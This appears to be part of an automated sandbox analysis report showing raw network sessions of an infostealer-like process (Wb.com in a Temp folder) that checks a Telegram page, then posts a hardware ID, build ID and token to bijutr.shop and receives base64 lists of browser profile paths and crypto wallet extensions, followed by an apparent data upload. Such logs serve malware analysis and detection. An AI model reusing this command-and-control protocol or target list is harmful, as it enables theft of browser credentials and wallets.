                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:26 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:26 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      Content-Length: 12298
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Set-Cookie: stel_ssid=84286bb816d85d4714_7163457332475443617; expires=Tue, 24 Dec 2024 16:14:26 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Cache-control: no-store
                                                                                                                                                                                                                                                                                                      X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:26 UTC12298INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                      3192.168.2.64975720.198.119.84443
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:29 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 35 69 4c 37 6a 65 5a 6e 61 45 75 43 63 61 46 63 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 63 39 66 32 64 66 36 35 31 30 36 31 38 34 33 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: 5iL7jeZnaEuCcaFc.1Context: ac9f2df651061843
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:29 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:29 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 35 69 4c 37 6a 65 5a 6e 61 45 75 43 63 61 46 63 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 63 39 66 32 64 66 36 35 31 30 36 31 38 34 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 43 63 71 47 62 59 74 57 34 6f 4b 62 78 7a 47 53 71 76 4c 44 76 42 50 4f 2f 73 6f 6d 33 4f 64 4f 43 45 41 6d 39 2f 67 5a 4c 30 47 64 34 78 53 51 52 33 42 4b 31 6b 4a 68 32 39 37 77 4b 34 2b 4a 52 2f 56 6e 58 64 70 6f 54 62 7a 64 35 77 74 55 67 44 45 34 50 65 4a 74 42 34 6c 4c 43 33 58 4a 57 70 6b 63 4b 42 61 35 59 65 6a 6b
                                                                                                                                                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 5iL7jeZnaEuCcaFc.2Context: ac9f2df651061843<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCcqGbYtW4oKbxzGSqvLDvBPO/som3OdOCEAm9/gZL0Gd4xSQR3BK1kJh297wK4+JR/VnXdpoTbzd5wtUgDE4PeJtB4lLC3XJWpkcKBa5Yejk
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:29 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 35 69 4c 37 6a 65 5a 6e 61 45 75 43 63 61 46 63 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 63 39 66 32 64 66 36 35 31 30 36 31 38 34 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: 5iL7jeZnaEuCcaFc.3Context: ac9f2df651061843<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:29 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:29 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4b 53 69 54 35 73 45 73 75 6b 61 72 51 67 37 50 4d 50 74 34 31 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                      Data Ascii: MS-CV: KSiT5sEsukarQg7PMPt41A.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      4192.168.2.649759188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:29 UTC231OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:29 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      5192.168.2.649765188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:31 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----ZM790RIWTRQIE37YCBIM
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 256
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:31 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 4d 37 39 30 52 49 57 54 52 51 49 45 33 37 59 43 42 49 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 36 30 32 35 42 33 32 32 36 30 33 38 31 30 32 38 39 34 34 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 5a 4d 37 39 30 52 49 57 54 52 51 49 45 33 37 59 43 42 49 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 5a 4d 37 39 30 52 49 57 54 52 51 49 45 33 37 59 43 42 49 4d 2d 2d 0d
                                                                                                                                                                                                                                                                                                      Data Ascii: ------ZM790RIWTRQIE37YCBIMContent-Disposition: form-data; name="hwid"356025B322603810289448-a33c7340-61ca------ZM790RIWTRQIE37YCBIMContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------ZM790RIWTRQIE37YCBIM--
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:31 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:32 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 7c 31 7c 31 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 3a1|1|1|1|a6e22ef9c5754ecf8211936ed13bd870|1|1|1|1|0|50000|10


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      6192.168.2.649771188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:33 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DJMYUAAS26FUAAS0HVS0
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:33 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 4a 4d 59 55 41 41 53 32 36 46 55 41 41 53 30 48 56 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 4d 59 55 41 41 53 32 36 46 55 41 41 53 30 48 56 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 4d 59 55 41 41 53 32 36 46 55 41 41 53 30 48 56 53 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------DJMYUAAS26FUAAS0HVS0Content-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------DJMYUAAS26FUAAS0HVS0Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------DJMYUAAS26FUAAS0HVS0Cont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:34 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:34 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                                      Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      7192.168.2.649777188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:35 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----LFKFUSJMYMYU37G4W4EK
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:35 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 46 4b 46 55 53 4a 4d 59 4d 59 55 33 37 47 34 57 34 45 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 4c 46 4b 46 55 53 4a 4d 59 4d 59 55 33 37 47 34 57 34 45 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 46 4b 46 55 53 4a 4d 59 4d 59 55 33 37 47 34 57 34 45 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------LFKFUSJMYMYU37G4W4EKContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------LFKFUSJMYMYU37G4W4EKContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------LFKFUSJMYMYU37G4W4EKCont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:36 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:36 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                                      Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      8192.168.2.649784188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:38 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----ZM790RIWTRQIE37YCBIM
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 332
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:38 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 4d 37 39 30 52 49 57 54 52 51 49 45 33 37 59 43 42 49 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 5a 4d 37 39 30 52 49 57 54 52 51 49 45 33 37 59 43 42 49 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 5a 4d 37 39 30 52 49 57 54 52 51 49 45 33 37 59 43 42 49 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------ZM790RIWTRQIE37YCBIMContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------ZM790RIWTRQIE37YCBIMContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------ZM790RIWTRQIE37YCBIMCont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:38 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:39 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      9192.168.2.649790188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:40 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----VKXT2NYUK6FU3ECBA1VA
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 6781
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:40 UTC6781OUTData Raw: 2d 2d 2d 2d 2d 2d 56 4b 58 54 32 4e 59 55 4b 36 46 55 33 45 43 42 41 31 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 58 54 32 4e 59 55 4b 36 46 55 33 45 43 42 41 31 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 58 54 32 4e 59 55 4b 36 46 55 33 45 43 42 41 31 56 41 0d 0a 43 6f 6e 74
